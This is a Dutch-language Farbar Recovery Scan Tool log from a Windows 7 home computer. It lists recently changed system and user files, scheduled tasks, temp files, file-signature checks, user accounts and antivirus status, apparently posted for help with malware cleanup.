2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:47 - 03993536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-01-30 15:23 - 2015-12-30 19:47 - 03938240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-01-30 15:23 - 2015-12-30 19:44 - 01311768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00171520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-01-30 15:23 - 2015-12-30 19:41 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-01-30 15:23 - 2015-12-30 19:40 - 00251392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-01-30 15:23 - 2015-12-30 19:40 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-01-30 15:23 - 2015-12-30 19:39 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-01-30 15:23 - 2015-12-30 19:39 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-01-30 15:23 - 2015-12-30 19:39 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-01-30 15:23 - 2015-12-30 19:39 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-01-30 15:23 - 2015-12-30 19:38 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-01-30 15:23 - 2015-12-30 19:38 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 18:57 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-01-30 15:23 - 2015-12-30 18:50 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-01-30 15:23 - 2015-12-30 18:49 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-01-30 15:23 - 2015-12-30 18:44 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-01-30 15:23 - 2015-12-30 18:43 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-01-30 15:23 - 2015-12-30 18:42 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-01-30 15:23 - 2015-12-30 18:42 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-01-30 15:23 - 2015-12-30 18:41 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-01-30 15:23 - 2015-12-30 18:41 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-01-30 15:23 - 2015-12-30 18:32 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-01-30 15:23 - 2015-12-30 18:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-01-30 15:23 - 2015-12-30 18:32 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-01-30 15:23 - 2015-12-30 18:32 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-01-30 15:23 - 2015-12-30 18:30 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-01-30 15:23 - 2015-12-30 18:30 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 18:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 18:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 18:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-01-30 15:23 - 2015-09-23 14:15 - 00460776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-01-30 15:23 - 2015-09-23 14:15 - 00299632 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2016-01-30 15:23 - 2015-09-23 14:09 - 00251000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2016-01-30 14:37 - 2015-10-13 17:41 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2016-01-30 14:37 - 2015-10-13 17:40 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2016-01-30 14:37 - 2015-06-15 22:45 - 03242496 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-01-30 14:37 - 2015-06-15 22:45 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2016-01-30 14:37 - 2015-06-15 22:44 - 00128000 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2016-01-30 14:37 - 2015-06-15 22:43 - 02364416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-01-30 14:37 - 2015-06-15 22:43 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2016-01-30 14:37 - 2015-06-15 22:42 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2016-01-30 14:37 - 2015-06-15 22:42 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2016-01-30 14:37 - 2015-06-15 22:37 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2016-01-30 14:36 - 2015-10-29 18:50 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2016-01-30 14:36 - 2015-10-29 18:50 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2016-01-30 14:36 - 2015-10-29 18:50 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2016-01-30 14:36 - 2015-10-29 18:50 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2016-01-30 14:36 - 2015-10-29 18:50 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2016-01-30 14:36 - 2015-10-29 18:49 - 00295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2016-01-30 14:36 - 2015-10-29 18:49 - 00020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2016-01-30 14:36 - 2015-07-30 19:06 - 02565120 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2016-01-30 14:36 - 2015-07-30 19:06 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-01-30 14:36 - 2015-07-30 19:06 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-01-30 14:36 - 2015-07-30 18:57 - 01987584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll
2016-01-30 14:36 - 2015-07-30 18:57 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2016-01-30 14:35 - 2015-07-23 01:02 - 01390592 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-01-30 14:35 - 2015-07-23 01:02 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2016-01-30 14:35 - 2015-07-22 18:53 - 00635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2016-01-30 14:35 - 2015-07-22 17:48 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-01-30 14:34 - 2015-11-03 20:04 - 00241664 _____ (Microsoft Corporation) C:\Windows\system32\els.dll
2016-01-30 14:34 - 2015-11-03 19:55 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\els.dll
2016-01-30 14:34 - 2015-10-13 05:57 - 00950720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2016-01-30 14:34 - 2015-10-01 19:00 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2016-01-30 14:34 - 2015-10-01 18:50 - 00216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2016-01-30 14:34 - 2015-07-09 18:57 - 00193536 _____ (Microsoft Corporation) C:\Windows\system32\notepad.exe
2016-01-30 14:34 - 2015-07-09 18:57 - 00193536 _____ (Microsoft Corporation) C:\Windows\notepad.exe
2016-01-30 14:34 - 2015-07-09 18:42 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
2016-01-30 14:34 - 2015-06-25 11:06 - 00115136 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-01-30 14:34 - 2015-06-25 11:01 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-01-30 14:34 - 2015-06-25 11:01 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-01-30 14:34 - 2015-06-25 10:44 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-01-30 14:34 - 2015-04-11 04:19 - 00069888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stream.sys
2016-01-30 14:31 - 2015-09-02 04:04 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-01-30 14:31 - 2015-09-02 04:04 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-01-30 14:31 - 2015-09-02 04:04 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2016-01-30 14:31 - 2015-09-02 04:04 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2016-01-30 14:31 - 2015-09-02 03:48 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-01-30 14:31 - 2015-09-02 03:48 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-01-30 14:31 - 2015-09-02 03:48 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2016-01-30 14:31 - 2015-09-02 03:47 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2016-01-30 14:31 - 2015-09-02 02:47 - 00372736 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-01-30 14:31 - 2015-09-02 02:33 - 00299520 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-01-30 14:31 - 2015-08-27 19:18 - 02004480 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2016-01-30 14:31 - 2015-08-27 19:18 - 01887232 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2016-01-30 14:31 - 2015-08-27 19:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml6r.dll
2016-01-30 14:31 - 2015-08-27 19:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2016-01-30 14:31 - 2015-08-27 18:58 - 01391104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2016-01-30 14:31 - 2015-08-27 18:58 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2016-01-30 14:31 - 2015-08-27 18:51 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6r.dll
2016-01-30 14:31 - 2015-08-27 18:51 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2016-01-30 13:02 - 2016-01-30 13:03 - 00048839 _____ C:\Users\Thomas\Downloads\BelastingdienstToeslagen.pdf
2016-01-30 12:53 - 2016-01-30 12:53 - 07635472 _____ (Microsoft Corporation) C:\Users\Thomas\Downloads\GetWindows10-Web_Default_Attr.exe
2016-01-30 12:45 - 2016-01-30 12:45 - 00690072 _____ (Dropbox, Inc.) C:\Users\Thomas\Downloads\DropboxInstaller (1).exe
2016-01-30 12:43 - 2016-01-31 11:58 - 00000000 ___RD C:\Users\Thomas\Documents\Dropbox
2016-01-30 12:43 - 2016-01-30 12:43 - 00001190 _____ C:\Users\Thomas\Desktop\Dropbox.lnk
2016-01-30 12:36 - 2016-01-30 12:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-01-30 12:34 - 2016-01-31 15:39 - 00001014 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2016-01-30 12:34 - 2016-01-31 12:39 - 00001010 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2016-01-30 12:34 - 2016-01-30 12:36 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-01-30 12:34 - 2016-01-30 12:34 - 00004010 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineUA
2016-01-30 12:34 - 2016-01-30 12:34 - 00003758 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineCore
2016-01-30 12:33 - 2016-01-30 12:33 - 00690072 _____ (Dropbox, Inc.) C:\Users\Thomas\Downloads\DropboxInstaller.exe
2016-01-30 12:16 - 2016-01-31 11:55 - 00000000 ____D C:\Users\Thomas\AppData\Local\Dropbox
2016-01-30 12:16 - 2016-01-30 12:16 - 00000000 ____D C:\ProgramData\Dropbox

==================== Een Maand Gewijzigd bestanden en mappen ========

(Als een item is opgenomen in de fixlist, het bestand/map wordt verplaatst.)

2016-01-31 15:52 - 2010-11-08 19:06 - 00000000 ___RD C:\Users\Thomas\Documents\My Dropbox
2016-01-31 15:34 - 2012-01-27 23:44 - 00001056 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-31 15:18 - 2012-04-10 09:22 - 00000940 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-31 14:55 - 2012-07-17 19:50 - 00000932 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000UA.job
2016-01-31 14:34 - 2012-01-27 23:44 - 00001052 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-31 12:37 - 2009-07-14 05:45 - 00023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-31 12:37 - 2009-07-14 05:45 - 00023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-31 11:52 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-30 21:57 - 2010-01-09 20:31 - 00815130 _____ C:\Windows\system32\perfh013.dat
2016-01-30 21:57 - 2010-01-09 20:31 - 00180230 _____ C:\Windows\system32\perfc013.dat
2016-01-30 21:57 - 2009-07-14 06:13 - 01865776 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-30 21:57 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2016-01-30 21:55 - 2014-10-03 12:30 - 00000000 ___RD C:\Users\Farah\Dropbox
2016-01-30 21:55 - 2014-10-03 12:28 - 00000000 ____D C:\Users\Farah\AppData\Roaming\Dropbox
2016-01-30 21:54 - 2014-10-03 12:30 - 00001190 _____ C:\Users\Farah\Desktop\Dropbox.lnk
2016-01-30 21:50 - 2009-07-14 05:45 - 00458400 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-30 21:10 - 2015-03-28 23:07 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-01-30 21:10 - 2015-03-28 23:07 - 00000000 ___SD C:\Windows\system32\GWX
2016-01-30 21:10 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-01-30 21:02 - 2011-01-31 12:52 - 01840444 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2016-01-30 20:55 - 2012-07-17 19:50 - 00000910 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000Core.job
2016-01-30 20:40 - 2012-07-06 22:00 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\vlc
2016-01-30 17:27 - 2015-04-12 12:25 - 00000000 ____D C:\Windows\system32\appraiser
2016-01-30 17:27 - 2014-04-24 21:24 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-01-30 16:59 - 2009-07-14 03:34 - 00000828 _____ C:\Windows\win.ini
2016-01-30 16:39 - 2010-08-13 09:49 - 00000000 ____D C:\Users\Thomas
2016-01-30 14:51 - 2011-04-18 19:23 - 00000000 ____D C:\Users\Thomas\AppData\Local\Google
2016-01-30 13:59 - 2015-12-30 18:12 - 00000000 ____D C:\Users\Thomas\AppData\Local\Battle.net
2016-01-30 13:58 - 2015-12-30 18:11 - 00000000 ____D C:\Program Files (x86)\Battle.net
2016-01-30 12:35 - 2015-12-30 18:17 - 00002192 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-30 12:35 - 2015-12-30 18:17 - 00002163 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-30 12:31 - 2010-11-08 19:05 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\Dropbox
2016-01-30 12:27 - 2010-01-09 12:38 - 00000000 ____D C:\ProgramData\Temp
2016-01-30 12:12 - 2010-09-02 22:20 - 00000000 ____D C:\Program Files (x86)\SpywareBlaster

==================== Bestanden in de root van sommige mappen =======

2014-11-19 23:30 - 2014-11-19 23:35 - 6000640 _____ () C:\Program Files (x86)\GUT609.tmp
2010-08-14 21:25 - 2010-11-16 23:30 - 0000352 _____ () C:\Users\Thomas\AppData\Roaming\wklnhst.dat
2010-08-13 10:00 - 2010-08-13 10:00 - 0000000 _____ () C:\Users\Thomas\AppData\Local\AtStart.txt
2015-12-19 14:20 - 2015-12-19 14:20 - 0000000 ____H () C:\Users\Thomas\AppData\Local\BITAF52.tmp
2010-08-13 10:00 - 2010-08-13 10:00 - 0000000 _____ () C:\Users\Thomas\AppData\Local\DSwitch.txt
2010-08-13 10:00 - 2010-08-13 10:00 - 0000000 _____ () C:\Users\Thomas\AppData\Local\QSwitch.txt
2010-11-02 00:47 - 2010-11-02 00:47 - 0000017 _____ () C:\Users\Thomas\AppData\Local\resmon.resmoncfg
2011-08-26 10:08 - 2011-08-26 10:08 - 0001892 _____ () C:\Users\Thomas\AppData\Local\Temp1.html
2011-08-26 10:09 - 2011-08-26 10:09 - 0020316 _____ () C:\Users\Thomas\AppData\Local\Temp15.html
2015-12-19 14:20 - 2015-12-19 14:20 - 0000000 _____ () C:\Users\Thomas\AppData\Local\{DC0B4DB1-A5EB-4CF1-A01B-0882609F4995}
2011-02-03 14:56 - 2011-02-03 15:34 - 0000024 _____ () C:\ProgramData\anwblog2010.cfg
2010-08-13 10:00 - 2011-05-04 11:24 - 0000181 _____ () C:\ProgramData\HPWALog.txt
2010-08-22 17:54 - 2010-08-22 18:21 - 0001423 _____ () C:\ProgramData\hpzinstall.log
2010-08-15 01:20 - 2012-08-08 20:46 - 0000900 ___SH () C:\ProgramData\KGyGaAvL.sys
2010-03-17 01:47 - 2010-03-17 01:47 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-01-09 13:27 - 2010-01-09 13:27 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-03-17 01:47 - 2010-03-17 01:47 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-01-09 13:22 - 2010-01-09 13:23 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2010-03-17 01:46 - 2010-03-17 01:46 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-03-17 01:47 - 2010-03-17 01:47 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-01-09 13:21 - 2010-01-09 13:22 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-01-09 13:23 - 2010-01-09 13:27 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-03-17 01:47 - 2010-03-17 01:47 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

Sommige bestanden in TEMP:
====================
C:\Users\Farah\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpoakndh.dll
C:\Users\Thomas\AppData\Local\Temp\drm_dialogs.dll
C:\Users\Thomas\AppData\Local\Temp\drm_dyndata_7330014.dll
C:\Users\Thomas\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmplxbs1h.dll
C:\Users\Thomas\AppData\Local\Temp\GUR8D6.exe
C:\Users\Thomas\AppData\Local\Temp\SkypeSetup.exe

==================== Bamital & volsnap =================

(Er is geen automatische fix voor bestanden die de verificatie niet doorkomen.)

C:\Windows\system32\winlogon.exe => Bestand is getekend
C:\Windows\system32\wininit.exe => Bestand is getekend
C:\Windows\SysWOW64\wininit.exe => Bestand is getekend
C:\Windows\explorer.exe => Bestand is getekend
C:\Windows\SysWOW64\explorer.exe => Bestand is getekend
C:\Windows\system32\svchost.exe => Bestand is getekend
C:\Windows\SysWOW64\svchost.exe => Bestand is getekend
C:\Windows\system32\services.exe => Bestand is getekend
C:\Windows\system32\User32.dll => Bestand is getekend
C:\Windows\SysWOW64\User32.dll => Bestand is getekend
C:\Windows\system32\userinit.exe => Bestand is getekend
C:\Windows\SysWOW64\userinit.exe => Bestand is getekend
C:\Windows\system32\rpcss.dll => Bestand is getekend
C:\Windows\system32\dnsapi.dll => Bestand is getekend
C:\Windows\SysWOW64\dnsapi.dll => Bestand is getekend
C:\Windows\system32\Drivers\volsnap.sys => Bestand is getekend

LastRegBack: 2015-04-01 22:30

==================== Eind van FRST.txt ============================

Addition:

Extra scanresultaten van Farbar Recovery Scan Tool (x64) Versie:27-01-2016
Gestart door Thomas (2016-01-31 15:54:34)
Gestart vanaf C:\Users\Thomas\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-08-13 08:49:20)
Boot Modus: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-1460008453-1702061876-2463211388-500 - Administrator - Disabled)
Farah (S-1-5-21-1460008453-1702061876-2463211388-1009 - Limited - Enabled) => C:\Users\Farah
Gast (S-1-5-21-1460008453-1702061876-2463211388-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1460008453-1702061876-2463211388-1002 - Limited - Enabled)
Thomas (S-1-5-21-1460008453-1702061876-2463211388-1000 - Administrator - Enabled) => C:\Users\Thomas

==================== Security Center ========================

(Als een item is opgenomen in de fixlist, zal het worden verwijderd.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Geïnstalleerde programma's ======================

